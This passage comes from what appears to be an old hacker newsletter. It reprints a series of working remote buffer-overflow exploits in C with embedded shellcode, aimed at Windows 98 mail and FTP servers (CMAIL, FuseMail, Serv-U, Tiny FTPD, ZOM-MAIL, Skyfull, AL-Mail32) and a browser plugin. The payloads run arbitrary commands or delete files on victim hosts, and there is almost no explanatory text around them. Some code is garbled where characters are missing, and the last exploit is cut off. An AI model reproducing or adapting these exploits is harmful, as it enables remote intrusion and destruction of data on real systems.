:) ############################################################################## @HWA 06.0 CMAIL Server 2.3 SP2 Exploit for Windows98/Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= CMAIL Server 2.3 SP2 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #include #include #include #include #define BUFSIZE 2000 #define SMTP_PORT 25 #define RETADR 626 #define JMPADR 622 #define JMPOFS 6 #define EIP 0xbff7a06b #define NOP 0x90 #define JMPS 0xeb unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF, 0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52, 0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF, 0xFF, 0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe"; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[BUFSIZE+3000],buf[BUFSIZE]; int sockfd,i,ip; if (argc<2){ printf("usage\n %s HostName\n",argv[0]); exit(1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(SMTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, 
sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); exploit_code[65]=strlen(cmdbuf+23); memset(buf,0x90,BUFSIZE); ip=EIP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR] =JMPS; buf[JMPADR+1]=JMPOFS; memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); buf[BUFSIZE]=0; sprintf(packetbuf,"helo penguin\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } printf("%s\n",packetbuf); sprintf(packetbuf,"MAIL FROM: aa <%s@aa.com>\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); sleep(100); close(sockfd); } @HWA 07.0 FuseMail Version 2.7 Exploit for Windows98/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= FuseMail Version 2.7 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #include #include #include #include #define BUFSIZE 1159 #define RETADR 1074 #define FTP_PORT 110 #define JMP_ESP 0xbff7a027 unsigned char exploit_code[200]={ 0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3, 0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF, 0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF, 0xFF,0x00 }; unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe"; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char 
packetbuf[3000],buf[1500]; int sockfd,i,ip; if (argc<2){ printf("usage\n %s HostName\n",argv[0]); exit(1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(FTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); memset(buf,'a',BUFSIZE); buf[BUFSIZE]=0; ip=JMP_ESP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); sprintf(packetbuf,"USER %s\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } memset(packetbuf,0,1024); sprintf(packetbuf,"PASS sample\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); close(sockfd); } @HWA 08.0 NetcPlus SmartServer3 Exploit for Windows98/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= NetcPlus SmartServer3 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #include #include #include #include #define BUFSIZE 2000 #define SMTP_PORT 25 #define RETADR 1167 #define JMPADR 1163 #define JMPOFS 6 #define EIP 
0xbff7a06b #define NOP 0x90 #define JMPS 0xeb unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF, 0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52, 0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF, 0xFF,0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe"; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[BUFSIZE+3000],buf[BUFSIZE]; int sockfd,i,ip; if (argc<2){ printf("usage\n %s HostName\n",argv[0]); exit(1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(SMTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); exploit_code[65]=strlen(cmdbuf+23); memset(buf,0x90,BUFSIZE); ip=EIP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR] =JMPS; buf[JMPADR+1]=JMPOFS; memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); buf[2000]=0; sprintf(packetbuf,"helo penguin\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } printf("%s\n",packetbuf); sprintf(packetbuf,"MAIL FROM: %s\r\n",buf); 
write(sockfd,packetbuf,strlen(packetbuf)); sleep(100); close(sockfd); } @HWA 09.0 FTP Serv-U Version 2.5 Exploit for Windows98/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= FTP Serv-U Version 2.5 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #include #include #include #include #define BUFSIZE 9000 #define FTP_PORT 21 #define RETADR 164 #define CODEOFS 200 #define FSTACKOFS 174 #define JMPOFS 6 #define MAXUSER 100 #define MAXPASS 100 #define EIP 0xbff7a027 #define FAKESTACK 0x80050101 #define NOP 0x90 #define JMPS 0xeb unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF, 0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52, 0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF, 0xFF,0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit.notepad.exe"; void sendcmd(int sockfd,char *packetbuf) { int i; write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } } int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[BUFSIZE+3000],buf[BUFSIZE]; char user[MAXUSER],pass[MAXPASS]; int sockfd,i,fakestack,ip,ebp,ins; if (argc<2){ printf("usage\n %s HostName {[username] [password]}\n",argv[0]); exit(1); }else if (argc==4){ strncpy(user,argv[2],MAXUSER-1); 
strncpy(pass,argv[3],MAXPASS-1); user[MAXUSER-1]=0; pass[MAXPASS-1]=0; }else{ strcpy(user,"anonymous"); strcpy(pass,"hoge@hohoho.com"); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(FTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); memset(buf,NOP,BUFSIZE); fakestack=FAKESTACK; for (i=0;i>8)&0xff; buf[i+2]=(fakestack>>16)&0xff; buf[i+3]=(fakestack>>24)&0xff; } ip=EIP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[RETADR+4]=JMPS; buf[RETADR+5]=JMPOFS; memcpy(buf+CODEOFS,exploit_code,strlen(exploit_code)); buf[BUFSIZE]=0; sprintf(packetbuf,"user %s\r\n",user); sendcmd(sockfd,packetbuf); sprintf(packetbuf,"pass %s\r\n",pass); sendcmd(sockfd,packetbuf); sprintf(packetbuf,"cwd %s\r\n",buf); sendcmd(sockfd,packetbuf); close(sockfd); } @HWA 10.0 Tiny FTPD Version 0.51 Exploit for Windows98/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= Tiny FTPD Version 0.51 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #include #include #include #include #define BUFSIZE 1000 #define FTP_PORT 21 
#define RETADR 137 #define JMPADR 133 #define CODEOFS 141 #define JMPOFS 6 #define JMP_EBX_ADR 0xbff7a06b unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF, 0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52, 0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF, 0xFF,0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit.notepad.exe"; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[3000],buf[1500]; int sockfd,i,ip; if (argc<2){ printf("usage\n %s HostName\n",argv[0]); exit(1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(FTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); memset(buf,'a',BUFSIZE); buf[BUFSIZE]=0; ip=JMP_EBX_ADR; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR ]=0xeb; buf[JMPADR+1]=0x06; strncpy(buf+CODEOFS,exploit_code,strlen(exploit_code)); memset(packetbuf,0,1024); sprintf(packetbuf,"USER %s\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } memset(packetbuf,0,1024); 
sprintf(packetbuf,"PASS sample\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); close(sockfd); } @HWA 11.0 ZOM-MAIL 1.09 Exploit/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= ZOM-MAIL 1.09 Exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #define TARGET_FILE "c:\\windows\\test.txt" #define MAXBUF 3000 #define RETADR 768 #define JMPESP_ADR 0xbffca4f7 #define STACK_BYTES 32 #define SMTP_PORT 25 #define CONTENT \ "Subject: [Warning!!] This is exploit test mail.\r\n"\ "MIME-Version: 1.0\r\n"\ "Content-Type: multipart/mixed; "\ "boundary=\"U3VuLCAzMSBPY3QgMTk5OSAxODowODo1OCArMDkwMA==\"\r\n"\ "Content-Transfer-Encoding: 7bit\r\n"\ "--U3VuLCAzMSBPY3QgMTk5OSAxODowODo1OCArMDkwMA==\r\n"\ "Content-Type: image/gif; name=\"%s.gif\"\r\n"\ "Content-Disposition: attachment;\r\n"\ " filename=\"temp.gif\"\r\n" unsigned char exploit_code[200]={ 0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3, 0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF, 0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF, 0xFF,0x00 }; unsigned char cmdbuf[200]="msvcrt.dll.remove."; void send_smtpcmd(SOCKET sock,char *cmd) { char reply[MAXBUF]; int r; send(sock,cmd,strlen(cmd),0); r=recv(sock,reply,MAXBUF,0); reply[r]=0; printf("%-11s: %s\n",strtok(cmd,":"),reply); } main(int argc,char *argv[]) { SOCKET sock; SOCKADDR_IN addr; WSADATA wsa; WORD wVersionRequested; unsigned int ip,p1,p2; char buf[MAXBUF],packetbuf[MAXBUF+1000]; struct hostent *hs; if (argc<3){ printf("This exploit removes \"%s\" on the victim host",TARGET_FILE); 
printf("usage: %s SMTPserver Mailaddress\n",argv[0]); return -1; } wVersionRequested = MAKEWORD( 2, 0 ); if (WSAStartup(wVersionRequested , &wsa)!=0){ printf("Winsock Initialization failed.\n"); return -1; } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ printf("Can not create socket.\n"); return -1; } addr.sin_family = AF_INET; addr.sin_port = htons((u_short)SMTP_PORT); if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); return -1; } addr.sin_family = hs->h_addrtype; memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length); } if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){ printf("Can not connect to specified host.\n"); return -1; } recv(sock,packetbuf,MAXBUF,0); printf("BANNER : %s\n",packetbuf); send_smtpcmd(sock,"EHLO mail.attcker-host.net\r\n"); send_smtpcmd(sock,"MAIL FROM: \r\n"); sprintf(packetbuf,"RCPT TO: <%s>\r\n",argv[2]); send_smtpcmd(sock,packetbuf); send_smtpcmd(sock,"DATA\r\n"); memset(buf,0x90,MAXBUF); buf[MAXBUF]=0; ip=JMPESP_ADR; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; strcat(exploit_code,cmdbuf); strcat(exploit_code,TARGET_FILE); p1=(unsigned int)LoadLibrary; p2=(unsigned int)GetProcAddress; exploit_code[0x0d]=p1&0xff; exploit_code[0x0e]=(p1>>8)&0xff; exploit_code[0x0f]=(p1>>16)&0xff; exploit_code[0x10]=(p1>>24)&0xff; exploit_code[0x1e]=p2&0xff; exploit_code[0x1f]=(p2>>8)&0xff; exploit_code[0x20]=(p2>>16)&0xff; exploit_code[0x21]=(p2>>24)&0xff; exploit_code[0x2a]=strlen(TARGET_FILE); memcpy(buf+RETADR+4+STACK_BYTES,exploit_code,strlen(exploit_code)); sprintf(packetbuf,CONTENT,buf); send(sock,packetbuf,strlen(packetbuf),0); send_smtpcmd(sock,".\r\n"); closesocket(sock); printf("Done.\n"); return FALSE; } @HWA 12.0 AL-Mail32 Version 1.10 Exploit for Windows98/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote 
Windows98 exploit from http://www.hack.co.za/ /*============================================================================= AL-Mail32 Version 1.10 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #define HEADER1 \ "From hehehe@hohoho.com Sat Jul 32 25:01 JST 1999\n"\ "Message-ID: <001_The_ShadowPenguinSecurity_@rockhopper>\n" #define HEADER2 \ "Content-Transfer-Encoding: 7bit\n"\ "X-Mailer: PenguinMailer Ver1.01\n"\ "Content-Type: text/plain; charset=US-ASCII\n"\ "Content-Length: 6\n"\ "\n"\ "hehe\n" #define RETADR 260 #define JMPADR 256 #define JMPOFS 6 #define JMP_EBX_ADR 0xbff7a06b #define CMDLENP 0x43 #define BUFEND 5000 #define FUNC "msvcrt.dll.system.exit." #define JMPS 0xeb #define NOP 0x90 unsigned char exploit_code[200]={ 0xEB,0x4D,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,0x83,0xC3,0x06,0x88,0x23, 0xB8,0x27,0x6E,0xF7,0xBF,0x40,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x04,0x88,0x23,0xB8,0x27,0x6E,0xF7,0xBF,0x40,0xFF,0xD0,0x8B,0xF8,0x43, 0x53,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,0x33,0xC0,0x50,0xFF,0xD7,0xE8, 0xAE,0xFF,0xFF,0xFF,0x00 }; main(int argc,char *argv[]) { FILE *fp; static char buf[10000]; int i,r,ip; if (argc!=3){ printf("usage : %s MailSpoolDirectry WindowsCommand\n",argv[0]); exit(1); } if ((fp=fopen(argv[1],"wb"))==NULL){ printf("Permittion denied :-P\n"); exit(1); } fwrite(HEADER1,1,strlen(HEADER1),fp); memset(buf,NOP,BUFEND); strcat(exploit_code,FUNC); strcat(exploit_code,argv[2]); exploit_code[CMDLENP]=strlen(argv[2]); strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); ip=JMP_EBX_ADR; buf[JMPADR] =0xeb; buf[JMPADR+1]=0x06; buf[RETADR+3]=0xff&(ip>>24); buf[RETADR+2]=0xff&(ip>>16); buf[RETADR+1]=0xff&(ip>>8); buf[RETADR] =ip&0xff; 
buf[BUFEND] =0; fprintf(fp,"Reply-To: \"%s\" \n",buf); fprintf(fp,"From: \"%s\" \n",buf); fwrite(HEADER2,1,strlen(HEADER2),fp); fclose(fp); } @HWA 13.0 YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #define MAXBUF 700 #define RETADR 256 unsigned int mems[]={ 0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000, 0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000, 0xbfee0000,0xbfee5000,0xbff20000,0xbff47000, 0xbff50000,0xbff61000,0xbff70000,0xbffc6000, 0xbffc9000,0xbffe3000,0,0}; unsigned char exploit_code[200]={ 0x90,0xEB,0x50,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x90,0x88,0x23,0xB8,0x50,0x57,0xF7,0xBF,0x80, 0xc4,0x20,0xFF,0xD0,0x43,0x90,0xB2,0xE0,0x90,0x28, 0x13,0x28,0x53,0x01,0x28,0x53,0x02,0x28,0x53,0x03, 0x28,0x53,0x04,0x28,0x53,0x05,0x53,0x50,0x32,0xE4, 0x83,0xC3,0x06,0x90,0x88,0x23,0xB8,0x28,0x4E,0xF7, 0xBF,0x80,0xc4,0x20,0xFF,0xD0,0x8B,0xF0,0x43,0x53, 0x90,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x90,0xEB,0xFD,0xE8,0xAB,0xFF,0xFF,0xFF,0x00 }; unsigned char cmdbuf[200]="MSVCRT.DLL.SYSTEM.WELCOME.EXE"; unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed, unsigned char c1,unsigned char c2) { unsigned char *p; unsigned int adr; for (p=st;p>8)&0xff)==0) continue; if (((adr>>16)&0xff)==0) continue; if (((adr>>24)&0xff)==0) continue; return(adr); } return(0); } main(int argc,char *argv[]) { FILE *fp; unsigned int i,ip; unsigned char buf[MAXBUF]; if (argc<2){ printf("usage %s output_htmlfile\n",argv[0]); exit(1); } if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE; fprintf(fp,">8)&0xff; 
buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; strcat(exploit_code,cmdbuf); memcpy(buf,exploit_code,strlen(exploit_code)); buf[MAXBUF]=0; fprintf(fp,"%s\"\n>\n",buf); fclose(fp); printf("%s created.\n",argv[1]); return FALSE; } @HWA 14.0 Skyfull Mail Server Version 1.1.4 Exploit/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Remote Windows98 exploit from http://www.hack.co.za/ /*============================================================================= Skyfull Mail Server Version 1.1.4 Exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #define MAXBUF 3000 #define RETADR 655 #define JMPADR 651 #define SMTP_PORT 25 #define JMPEAX_ADR 0xbfe0a035 unsigned char exploit_code[200]={ 0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3, 0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF, 0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF, 0xFF,0x00 }; unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe"; main(int argc,char *argv[]) { SOCKET sock; SOCKADDR_IN addr; WSADATA wsa; WORD wVersionRequested; unsigned int ip,p1,p2; static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000]; struct hostent *hs; if (argc<2){ printf("usage: %s VictimHost\n",argv[0]); return -1; } wVersionRequested = MAKEWORD( 2, 0 ); if (WSAStartup(wVersionRequested , &wsa)!=0){ printf("Winsock Initialization failed.\n"); return -1; } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ printf("Can not create socket.\n"); return -1; } addr.sin_family = AF_INET; addr.sin_port = htons((u_short)SMTP_PORT); if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve 
specified host.\n"); return -1; } addr.sin_family = hs->h_addrtype; memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length); } if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){ printf("Can not connect to specified host.\n"); return -1; } recv(sock,packetbuf,MAXBUF,0); printf("BANNER FROM \"%s\" : %s\n",argv[1],packetbuf); memset(buf,0x90,MAXBUF); buf[MAXBUF]=0; ip=JMPEAX_ADR; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR ]=0xeb; buf[JMPADR+1]=0x80; strcat(exploit_code,cmdbuf); p1=(unsigned int)LoadLibrary; p2=(unsigned int)GetProcAddress; exploit_code[0x0d]=p1&0xff; exploit_code[0x0e]=(p1>>8)&0xff; exploit_code[0x0f]=(p1>>16)&0xff; exploit_code[0x10]=(p1>>24)&0xff; 